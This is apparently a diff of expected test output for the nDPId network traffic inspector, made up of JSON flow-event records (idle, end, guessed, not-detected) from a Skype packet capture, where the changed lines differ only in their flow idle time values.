+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1431970636044,"flow_last_seen":1431970646741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":590,"flow_avg_l4_payload_len":73,"midstream":1,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"17.143.160.149","dst_ip":"192.168.1.34","src_port":5223,"dst_port":50407,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} +00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970686843,"flow_last_seen":1431970687201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51286,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970686843,"flow_last_seen":1431970687201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51286,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970668278,"flow_last_seen":1431970694737,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63342,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00612{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970699896,"flow_last_seen":1431970708272,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"93.79.224.176","src_port":51311,"dst_port":14506,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970699896,"flow_last_seen":1431970708272,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"93.79.224.176","src_port":51311,"dst_port":14506,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970701508,"flow_last_seen":1431970702603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":323,"flow_tot_l4_payload_len":719,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"93.79.224.176","src_port":51314,"dst_port":14506,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970701508,"flow_last_seen":1431970702603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":323,"flow_tot_l4_payload_len":719,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"93.79.224.176","src_port":51314,"dst_port":14506,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970693196,"flow_last_seen":1431970706224,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970693196,"flow_last_seen":1431970706224,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00612{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970688560,"flow_last_seen":1431970700671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":51291,"dst_port":17639,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970688560,"flow_last_seen":1431970700671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":51291,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1431970689672,"flow_last_seen":1431970694329,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1124,"flow_tot_l4_payload_len":2899,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":51294,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} -00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970691351,"flow_last_seen":1431970701913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"82.224.110.241","src_port":51298,"dst_port":38895,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970691351,"flow_last_seen":1431970701913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"82.224.110.241","src_port":51298,"dst_port":38895,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970692464,"flow_last_seen":1431970694362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"82.224.110.241","src_port":51301,"dst_port":38895,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970692464,"flow_last_seen":1431970694362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"82.224.110.241","src_port":51301,"dst_port":38895,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00612{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970699896,"flow_last_seen":1431970708272,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"93.79.224.176","src_port":51311,"dst_port":14506,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970699896,"flow_last_seen":1431970708272,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"93.79.224.176","src_port":51311,"dst_port":14506,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970701508,"flow_last_seen":1431970702603,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":323,"flow_tot_l4_payload_len":719,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"93.79.224.176","src_port":51314,"dst_port":14506,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970701508,"flow_last_seen":1431970702603,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":323,"flow_tot_l4_payload_len":719,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"93.79.224.176","src_port":51314,"dst_port":14506,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970693196,"flow_last_seen":1431970706224,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970693196,"flow_last_seen":1431970706224,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00612{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970688560,"flow_last_seen":1431970700671,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":51291,"dst_port":17639,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970688560,"flow_last_seen":1431970700671,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":51291,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1431970689672,"flow_last_seen":1431970694329,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1124,"flow_tot_l4_payload_len":2899,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":51294,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} +00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970691351,"flow_last_seen":1431970701913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"82.224.110.241","src_port":51298,"dst_port":38895,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970691351,"flow_last_seen":1431970701913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"82.224.110.241","src_port":51298,"dst_port":38895,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970692464,"flow_last_seen":1431970694362,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"82.224.110.241","src_port":51301,"dst_port":38895,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970692464,"flow_last_seen":1431970694362,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"82.224.110.241","src_port":51301,"dst_port":38895,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1431970685839,"flow_last_seen":1431970687668,"flow_idle_time":120000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970648979,"flow_last_seen":1431970679027,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970648880,"flow_last_seen":1431970678945,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970659834,"flow_last_seen":1431970689548,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51251,"dst_port":40029,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970659834,"flow_last_seen":1431970689548,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51251,"dst_port":40029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970682971,"flow_last_seen":1431970692227,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51278,"dst_port":40009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970682971,"flow_last_seen":1431970692227,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51278,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970659834,"flow_last_seen":1431970689548,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51251,"dst_port":40029,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970659834,"flow_last_seen":1431970689548,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51251,"dst_port":40029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970682971,"flow_last_seen":1431970692227,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51278,"dst_port":40009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970682971,"flow_last_seen":1431970692227,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51278,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970664361,"flow_last_seen":1431970664361,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 
00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970664698,"flow_last_seen":1431970664698,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.229","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970632290,"flow_last_seen":1431970632290,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431970635325,"flow_last_seen":1431970688837,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63514,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
